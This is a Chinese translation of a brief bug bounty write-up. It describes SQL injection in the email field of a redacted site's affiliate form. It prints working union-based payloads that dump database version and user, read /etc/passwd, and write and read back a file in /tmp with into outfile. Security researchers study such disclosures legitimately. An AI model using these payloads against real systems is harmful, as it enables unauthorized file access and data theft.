第十五篇:SQL注入读取、写入文件

原文:SQL injection with load file and into outfile

漏洞:SQL注入漏洞

作者:NoGe

难度:低

我像往常一样注册网站会员

然后通过POST方法将表单信息发送到 https://www.blablabla.com/svc/*****/form_affiliate。

这里的email参数存在SQL注入漏洞

于是我在请求框 [email=””]参数中插入SQL语句

1
' and 1=2 union all select concat_ws(0x3a,version(),user(),database())--+

结果在响应窗口显示 “5.5.41-log:root@10.130.0.1:tp_cart”。

现在我尝试使用SQL命令来读取文件

1
' and 1=2 union all select load_file('/etc/passwd')--+

接着尝试在/tmp目录写入文件

1
' and 1=2 union all select 'blablalba_bug_bounty_program' into outfile '/tmp/blablabla'--+

最后我们看看文件是否成功写入

1
' and 1=2 union all select load_file('/tmp/blablabla')--+

文章目录
  1. 1. 原文:SQL injection with load file and into outfile
  2. 2. 漏洞:SQL注入漏洞
  3. 3. 作者:NoGe
  4. 4. 难度:低
  5. 5. 我像往常一样注册网站会员
  6. 6. 然后通过POST方法将表单信息发送到 https://www.blablabla.com/svc/*****/form_affiliate。
  7. 7. 这里的email参数存在SQL注入漏洞
  8. 8. 于是我在请求框 [email=””]参数中插入SQL语句
  9. 9. 结果在响应窗口显示 “5.5.41-log:root@10.130.0.1:tp_cart”。
  10. 10. 现在我尝试使用SQL命令来读取文件
  11. 11. 接着尝试在/tmp目录写入文件
  12. 12. 最后我们看看文件是否成功写入
|